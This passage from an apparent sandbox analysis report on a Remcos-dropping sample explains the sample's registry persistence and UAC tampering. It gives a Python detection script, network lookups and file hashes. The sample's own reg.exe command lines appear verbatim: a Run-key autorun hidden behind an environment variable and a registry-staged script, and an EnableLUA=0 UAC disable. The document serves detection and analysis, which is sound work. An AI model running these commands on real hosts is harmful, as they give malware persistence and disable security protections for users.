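Two of the reg.exe command lines above carry the persistence and UAC-tampering behaviour the signatures flag. The Run value `Biotron` is REG_EXPAND_SZ data that begins with `%Habilitcar%`, an environment variable that does not exist on a clean Windows install, so the launcher binary is resolved at expansion time instead of being named in the value, and the script it runs is read back from `HKCU:\kostbare\Storbyer` with `Get-ItemProperty` rather than from a file. The second line sets `EnableLUA` to 0 under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System`, which disables UAC from the next logon. The Python below is an added detection example written for this report, not sandbox or sample code: it parses `reg add` command lines into key, value name, type and data and then flags those three behaviours. Its inputs are the command lines from the Processes section plus one benign line for contrast; the finding names are my own, and the environment-variable check is a deliberately coarse heuristic (it would also fire on `%windir%`). On a live host, follow up by reading `HKCU\Environment` and the user's volatile environment for `Habilitcar` and `HKCU\kostbare` for the staged script.

```python
from __future__ import annotations

import re

# Added detection example for this report; not sandbox or sample code.
# Command lines copied verbatim from the Processes section.
RUN_KEY_CMD = r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"'''
ENABLELUA_CMD = r'/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f'
# Benign line for contrast (the script's own 115^^0 helper, also on the page).
BENIGN_CMD = r'"C:\Windows\system32\cmd.exe" /c set /A 115^^0'

TOKEN_RE = re.compile(r'"[^"]*"|\S+')          # quoted token or bare token
RUN_KEY_RE = re.compile(r'\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?$', re.I)
ENV_VAR_RE = re.compile(r'%[^%\s]+%')           # %NAME% anywhere in the value data
OPTION_FIELDS = {'/v': 'value_name', '/t': 'type', '/d': 'data'}


def parse_reg_add(cmdline: str) -> dict | None:
    """Return key/value_name/type/data/force for a `reg add` line, or None if it is not one.

    The executable may be bare (`REG`), `reg.exe`, or a full path such as %windir%\System32\reg.exe.
    """
    tokens = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    for i in range(len(tokens) - 2):
        exe = tokens[i].lower().rsplit('\\', 1)[-1]
        if exe in ('reg', 'reg.exe') and tokens[i + 1].lower() == 'add':
            break
    else:
        return None
    entry = {'key': tokens[i + 2], 'value_name': None, 'type': None, 'data': None, 'force': False}
    rest = tokens[i + 3:]
    j = 0
    while j < len(rest):
        opt = rest[j].lower()
        if opt == '/f':
            entry['force'] = True
        elif opt in OPTION_FIELDS and j + 1 < len(rest):
            entry[OPTION_FIELDS[opt]] = rest[j + 1]
            j += 1
        j += 1
    return entry


def assess(entry: dict | None) -> set[str]:
    """Map a parsed `reg add` onto the behaviours seen in this sample."""
    findings: set[str] = set()
    if entry is None:
        return findings
    key = entry['key'] or ''
    data = entry['data'] or ''
    if RUN_KEY_RE.search(key):
        findings.add('run_key_persistence')
        # REG_EXPAND_SZ plus %VAR% means the launcher is decided when the value is expanded.
        if (entry['type'] or '').upper() == 'REG_EXPAND_SZ' and ENV_VAR_RE.search(data):
            findings.add('launcher_hidden_in_env_var')
        # The autorun body is fetched from another registry value instead of a file on disk.
        if re.search(r'Get-ItemProperty|\bHK(?:CU|LM):', data, re.I):
            findings.add('stage_loaded_from_registry')
    if (key.lower().endswith(r'\currentversion\policies\system')
            and (entry['value_name'] or '').lower() == 'enablelua'
            and data.strip().lower() in ('0', '0x0')):
        findings.add('uac_disabled_enablelua')
    return findings


def assess_cmdline(cmdline: str) -> set[str]:
    """Convenience wrapper: parse and assess one process command line."""
    return assess(parse_reg_add(cmdline))


if __name__ == '__main__':
    for line in (RUN_KEY_CMD, ENABLELUA_CMD, BENIGN_CMD):
        print(sorted(assess_cmdline(line)) or ['(no finding)'], '<-', line[:72])
```

Run over the three lines, the Run-key command yields all three persistence findings, the EnableLUA command yields `uac_disabled_enablelua`, and the `set /A` helper yields nothing. The same parser can be pointed at Sysmon event ID 1 or 4688 command lines; the WOW64 path variants on this page (`C:\Windows\System32\reg.exe` launched from `C:\Windows\SysWOW64\cmd.exe`) are handled because only the executable's basename is checked.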

Network

Country Destination Domain Proto
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 78.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 1.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
GB 172.217.169.78:443 drive.google.com tcp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 3bb192572878028a805ba6cbb1c46538
SHA1 883d9e6730b0288d09742546aa64e0dc5ba6ab26
SHA256 14d1ba8a498795b848ecd5bd316d8df4cb6f4278609aab1caf353346f1d6fb43
SHA512 59b62ecc81033693a5bb6970f54a1564968136daa05d9e46c5fa26cb94d56fff23fb5f45ec3d9cc627b0a5d2255f679be2361cf684675d3548deac660fa40a7c

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 0ba3f0fb7f22ed631bc2d704810afdb6
SHA1 160465127007737cb73903e8967bb9c545bd9c5e
SHA256 c38e09ab888c21242d8a7eaa4e1a1f378a8beae8f5b362a01595b06487f6a97b
SHA512 cda5c288d26eeade294a979cb3d3509175091539ffa822431d9e8fd5f185caa28aaf0c6de1afa173cabe5864b0b2ffdb122d88555f00f654683cb6fc2788ff66

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 ce31aad931645728cb11543a9cd80f8e
SHA1 3e04faa0eebb25e42df967a276d3ce916947adf9
SHA256 5e765d9805803b5190ecf3cb07505d8ddc2b45645240c0ce905ecbda3e46ab06
SHA512 07e2f610945bac67ded6f43b0422295fe5803aeb91b6e4208350bb197f27ee73340462969917e883e3a3aac60a34eb5c779802d9223b04b11010e761c198e5e7

memory/2412-249-0x0000014E78500000-0x0000014E78522000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ta0tvgc.tjo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2412-254-0x00007FFD55010000-0x00007FFD55AD1000-memory.dmp

memory/2412-255-0x0000014E78320000-0x0000014E78330000-memory.dmp

memory/2412-256-0x0000014E78320000-0x0000014E78330000-memory.dmp

memory/2412-257-0x0000014E78320000-0x0000014E78330000-memory.dmp

memory/2412-258-0x0000014E7AB50000-0x0000014E7AB76000-memory.dmp

memory/2412-259-0x0000014E7ABB0000-0x0000014E7ABC4000-memory.dmp

memory/540-260-0x0000000074630000-0x0000000074DE0000-memory.dmp

memory/540-261-0x0000000002B80000-0x0000000002BB6000-memory.dmp

memory/540-262-0x0000000005050000-0x0000000005060000-memory.dmp

memory/540-263-0x0000000005690000-0x0000000005CB8000-memory.dmp

memory/540-264-0x00000000055E0000-0x0000000005602000-memory.dmp

memory/540-265-0x0000000005CC0000-0x0000000005D26000-memory.dmp

memory/540-266-0x0000000005DA0000-0x0000000005E06000-memory.dmp

memory/540-276-0x0000000005E90000-0x00000000061E4000-memory.dmp

memory/540-277-0x00000000064B0000-0x00000000064CE000-memory.dmp

memory/540-278-0x0000000006500000-0x000000000654C000-memory.dmp

memory/540-279-0x0000000005050000-0x0000000005060000-memory.dmp

memory/2412-280-0x00007FFD55010000-0x00007FFD55AD1000-memory.dmp

memory/540-281-0x0000000007CF0000-0x000000000836A000-memory.dmp

memory/540-282-0x0000000006980000-0x000000000699A000-memory.dmp

memory/2412-283-0x0000014E78320000-0x0000014E78330000-memory.dmp

memory/2412-284-0x0000014E78320000-0x0000014E78330000-memory.dmp

memory/540-285-0x0000000007760000-0x00000000077F6000-memory.dmp

memory/540-286-0x00000000076F0000-0x0000000007712000-memory.dmp

memory/2412-287-0x0000014E78320000-0x0000014E78330000-memory.dmp

memory/540-288-0x0000000008920000-0x0000000008EC4000-memory.dmp

memory/540-289-0x0000000007680000-0x00000000076A2000-memory.dmp

memory/540-290-0x00000000079A0000-0x00000000079B4000-memory.dmp

memory/540-291-0x0000000074630000-0x0000000074DE0000-memory.dmp

memory/540-293-0x0000000005050000-0x0000000005060000-memory.dmp

memory/540-294-0x0000000007BF0000-0x0000000007BF1000-memory.dmp

memory/540-295-0x0000000008ED0000-0x000000000CB78000-memory.dmp

memory/540-296-0x0000000005050000-0x0000000005060000-memory.dmp

memory/540-297-0x0000000077051000-0x0000000077171000-memory.dmp

memory/540-298-0x0000000005050000-0x0000000005060000-memory.dmp

memory/5104-299-0x00000000770D8000-0x00000000770D9000-memory.dmp

memory/5104-300-0x0000000077051000-0x0000000077171000-memory.dmp

memory/5104-313-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-314-0x0000000077051000-0x0000000077171000-memory.dmp

C:\ProgramData\Remcos\remcos.exe

MD5 251e51e2fedce8bb82763d39d631ef89
SHA1 677a3566789d4da5459a1ecd01a297c261a133a2
SHA256 2682086ace1970d5573f971669591b731f87d749406927bd7a7a4b58c3c662e9
SHA512 3b49e6d9197b12ca7aa282707d62496d9feac32b3f6fd15affd4eaaa5239da903fadd4600a1d17a45ec330a590fc86218c9a7dc20306b52d8170e04b0e325521

memory/5104-366-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-367-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-315-0x00000000024C0000-0x0000000006168000-memory.dmp

memory/5104-368-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/540-369-0x0000000074630000-0x0000000074DE0000-memory.dmp

memory/5104-380-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-383-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-379-0x00000000024C0000-0x0000000006168000-memory.dmp

memory/2412-384-0x00007FFD55010000-0x00007FFD55AD1000-memory.dmp

memory/5104-386-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-387-0x0000000001260000-0x00000000012E2000-memory.dmp

memory/5104-388-0x0000000077051000-0x0000000077171000-memory.dmp

memory/5104-389-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-390-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-391-0x0000000001260000-0x00000000024B4000-memory.dmp